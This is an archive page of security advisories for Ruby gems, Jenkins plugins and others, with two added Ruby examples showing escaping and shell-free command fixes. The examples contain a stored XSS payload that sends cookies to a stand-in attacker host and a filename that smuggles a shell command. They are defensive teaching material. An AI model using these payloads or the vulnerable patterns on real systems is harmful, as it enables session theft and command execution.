TechMedia

Archive

Month: May 2022

376 Posts

Featured

Posted by Wpmaster
The reality of wiper attacks seen in the war in Ukraine, and digital information manipulation
Posted by Wpmaster
"Ace Combat" and "Top Gun: Maverick" in a dream collaboration! Maverick-skin versions of the "F-14A Tomcat" and "F/A-18E Super Hornet" arrive!
Posted by Wpmaster
Yukihiro Takahashi marks 50 years of solo work! Details announced of the live recordings included in the "T.E.N.T Years Vinyl Box"!
Posted by Wpmaster
[camaleon_cms] Camaleon CMS Stored Cross-site Scripting vulnerability

[fat_free_crm] Fat Free CRM vulnerable to SQL Injection

  • Posted in MODERATE
  • Posted by Wpmaster
  • Published 05/17/2022, updated 01/23/2023

Multiple SQL injection vulnerabilities in app/controllers/home_controller.rb in Fat Free CRM before 0.12.1 allow remote authenticated users to execute arbitrary SQL commands via (1) the homepage timeline feature or (2) the activity feature.
References
…

[fat_free_crm] Fat Free CRM subject to Cross-site Scripting

  • Posted in MODERATE
  • Posted by Wpmaster
  • Published 05/17/2022, updated 01/23/2023

Multiple cross-site scripting (XSS) vulnerabilities in app/views/layouts/application.html.haml in Fat Free CRM before 0.13.3 allow remote attackers to inject arbitrary web script or HTML via the (1) username, (2) first name, or (3) last name in a (a) c…
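The class of bug described above (user-controlled profile fields placed into a shared layout without escaping) is shown below as an added example; this is not Fat Free CRM's code, and the header template, the `render_*` helpers and the stored attacker profile are constructed for illustration. It uses only Ruby's standard `erb` library: the "before" template emits the fields raw, the "after" template passes each one through `ERB::Util.h`, and a small check function can be dropped into a view test to catch regressions.

```ruby
require "erb"

# Constructed stored profile: the attacker has saved payloads into the fields the
# advisory names (username, first name, last name). Every visitor whose page
# renders this profile executes them if the layout does not escape.
ATTACKER_PROFILE = {
  username:   "\" onmouseover=\"alert(1)",
  first_name: "<script>fetch('https://evil.example/?c=' + document.cookie)</script>",
  last_name:  "Mallory",
}.freeze

# Before: unescaped output (the `!=` form in HAML, a plain <%= %> in ERB). Any
# markup stored in the record lands in the page verbatim, in text and in an
# attribute value alike.
UNSAFE_HEADER = ERB.new(<<~TEMPLATE, trim_mode: "-")
  <div id="header">Signed in as <%= user[:first_name] %> <%= user[:last_name] %>
  (<a title="<%= user[:username] %>" href="/profile">profile</a>)</div>
TEMPLATE

# After: every user-controlled value goes through ERB::Util.h, which encodes
# & < > " and ', so the values are inert in both text and quoted-attribute context.
SAFE_HEADER = ERB.new(<<~TEMPLATE, trim_mode: "-")
  <div id="header">Signed in as <%= ERB::Util.h(user[:first_name]) %> <%= ERB::Util.h(user[:last_name]) %>
  (<a title="<%= ERB::Util.h(user[:username]) %>" href="/profile">profile</a>)</div>
TEMPLATE

def render_unsafe(user)
  UNSAFE_HEADER.result_with_hash(user: user)
end

def render_safe(user)
  SAFE_HEADER.result_with_hash(user: user)
end

# Regression check for a layout: render it with the marker payloads and confirm
# that neither the raw <script> tag nor the attribute breakout survives.
def leaks_raw_markup?(render, user = ATTACKER_PROFILE)
  html = render.call(user)
  html.include?("<script>") || html.include?("\" onmouseover=")
end

if __FILE__ == $PROGRAM_NAME
  puts render_unsafe(ATTACKER_PROFILE)   # payloads reach the browser as live markup
  puts render_safe(ATTACKER_PROFILE)     # &lt;script&gt; and &quot; instead
  p leaks_raw_markup?(method(:render_unsafe)), leaks_raw_markup?(method(:render_safe))
end
```

Escaping at output time, per context, is the fix; stripping tags on input is not, because the same value may later be emitted into an attribute, a script block or a JSON body where different characters matter.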

[sup] Sup Code Injection vulnerability

  • Posted in MODERATE
  • Posted by Wpmaster
  • Published 05/17/2022, updated 01/27/2023

lib/sup/message_chunks.rb in Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the content_type of an email attachment.
References

https://nvd.nist.gov/vuln/detail/CVE-2013…

[org.jboss.resteasy:resteasy-client] JacksonJsonpInterceptor susceptible to cross-site script inclusion (XSSI) attack

  • Posted in MODERATE
  • Posted by Wpmaster
  • Published 05/17/2022, updated 02/01/2023

JacksonJsonpInterceptor in RESTEasy might allow remote attackers to conduct a cross-site script inclusion (XSSI) attack.
References

https://nvd.nist.gov/vuln/detail/CVE-2016-6348
https://bugzilla.redhat.com/show_bug.cgi?id=1372129
https://github.com/a…

[karteek-docsplit] Karteek Docsplit vulnerable to OS Command Injection

  • Posted in HIGH
  • Posted by Wpmaster
  • Published 05/17/2022, updated 01/27/2023

The extract_from_ocr function in lib/docsplit/text_extractor.rb in the Karteek Docsplit (karteek-docsplit) gem 0.5.4 for Ruby allows context-dependent attackers to execute arbitrary commands via shell metacharacters in a PDF filename.
References

https…
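The Sup advisory (shell metacharacters in an attachment's content_type) and the Docsplit advisory above (shell metacharacters in a PDF filename) are the same defect: an untrusted string interpolated into a command line that Ruby hands to /bin/sh. The following is an added example, not code from either project; `cat` stands in for the external tool so it runs anywhere, and the `extract_text_*` and `media_type` helpers are hypothetical names. It shows the vulnerable backtick pattern next to the two standard-library fixes (argv-form `Open3.capture2`, and `Shellwords.escape` when a shell string is unavoidable) plus an allowlist for the Content-Type case.

```ruby
require "open3"
require "shellwords"
require "tmpdir"

# `cat` stands in for the real external tool (pdftotext in Docsplit, a MIME
# handler in Sup) so the example runs on any POSIX box. The bug is identical.
TOOL = "cat".freeze

# VULNERABLE (the pattern behind both advisories): the untrusted value is
# spliced into a shell command line. Because the string contains shell
# metacharacters, Ruby runs it through /bin/sh, which honours ';', '|', '$(...)'
# and backticks, so whatever follows the filename executes too.
def extract_text_unsafe(pdf_path)
  `#{TOOL} #{pdf_path}`
end

# FIXED: argv form. No shell is involved, the path is exactly one argument to the
# tool, and a failed run is reported instead of silently returning stdout.
def extract_text_safe(pdf_path)
  out, status = Open3.capture2(TOOL, pdf_path)
  raise "extraction failed for #{pdf_path.inspect}" unless status.success?
  out
end

# If a shell string is genuinely needed (pipes, redirects), escape each operand.
def extract_text_escaped(pdf_path)
  `#{TOOL} #{Shellwords.escape(pdf_path)}`
end

# For the Sup case the value is a MIME Content-Type header. Reduce it to the
# type/subtype and allow only the characters registered media types use. This is
# deliberately stricter than the RFC 2045 token grammar, which permits backticks
# and '$'. Parameters after ';' are dropped, not validated. Returns nil on reject.
MEDIA_TYPE = %r{\A[A-Za-z0-9][A-Za-z0-9.+-]*/[A-Za-z0-9][A-Za-z0-9.+-]*\z}

def media_type(content_type)
  type = content_type.to_s.split(";", 2).first.to_s.strip.downcase
  type.match?(MEDIA_TYPE) ? type : nil
end

if __FILE__ == $PROGRAM_NAME
  Dir.mktmpdir do |dir|
    benign  = File.join(dir, "report.pdf")
    File.write(benign, "hello\n")
    payload = "#{benign}; echo INJECTED"   # constructed attacker-chosen filename
    puts extract_text_unsafe(payload)      # hello, then INJECTED: the shell ran both
    p extract_text_escaped(payload)        # "": cat looked for the literal odd name
    begin
      extract_text_safe(payload)
    rescue RuntimeError => e
      puts e.message                       # extraction failed for "...; echo INJECTED"
    end
    p media_type("text/plain; charset=utf-8"), media_type("text/x-`id`")
  end
end
```

Prefer the argv form over escaping: `Shellwords.escape` only protects the operand it wraps, so a second interpolation elsewhere on the same line reopens the hole, whereas `Open3.capture2`, `system(*argv)` and `IO.popen(argv)` never consult a shell at all. The allowlist is defence in depth for the Content-Type case, not a substitute for the argv form.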

[org.jenkins-ci.plugins:pollscm] Jenkins Poll SCM Plugin vulnerable to Cross-Site Request Forgery

  • Posted in HIGH
  • Posted by Wpmaster
  • Published 05/17/2022, updated 12/13/2022

Jenkins Poll SCM Plugin was not requiring requests to its API be sent via POST, thereby opening itself to Cross-Site Request Forgery attacks. This allowed attackers to initiate polling of projects with a known name. While Jenkins in general does not co…

[org.jenkins-ci.plugins:docker-commons] Jenkins Docker Commons Plugin allows any user with Overall/Read permission to get list of valid credentials IDs

  • Posted in MODERATE
  • Posted by Wpmaster
  • Published 05/17/2022, updated 12/13/2022

Docker Commons Plugin provides a list of applicable credential IDs to allow users configuring a job to select the one they’d like to use to authenticate with a Docker Registry. This functionality did not check permissions, allowing any user with Overal…

[org.jenkins-ci.plugins:github-branch-source] Jenkins GitHub Branch Source Plugin vulnerable to Cross-Site Request Forgery

  • Posted in MODERATE
  • Posted by Wpmaster
  • Published 05/17/2022, updated 12/13/2022

GitHub Branch Source Plugin connects to a user-specified GitHub API URL (e.g. GitHub Enterprise) as part of form validation and completion (e.g. to verify Scan Credentials are correct). This functionality improperly checked permissions, allowing any us…

[ccsv] ccsv Double Free vulnerability

  • Posted in MODERATE
  • Posted by Wpmaster
  • Published 05/17/2022, updated 01/27/2023

The foreach function in ext/ccsv.c in Ccsv 1.1.0 allows remote attackers to cause a denial of service (double free and application crash) or possibly have unspecified other impact via a crafted file.
References

https://nvd.nist.gov/vuln/detail/CVE-201…

[org.jenkins-ci.plugins:github-branch-source] Jenkins GitHub Branch Source Plugin allows any user with Overall/Read permission to get list of valid credentials IDs

  • Posted in MODERATE
  • Posted by Wpmaster
  • Published 05/17/2022, updated 12/13/2022

GitHub Branch Source provides a list of applicable credential IDs to allow users configuring a job to select the one they’d like to use. This functionality did not check permissions, allowing any user with Overall/Read permission to get a list of valid…
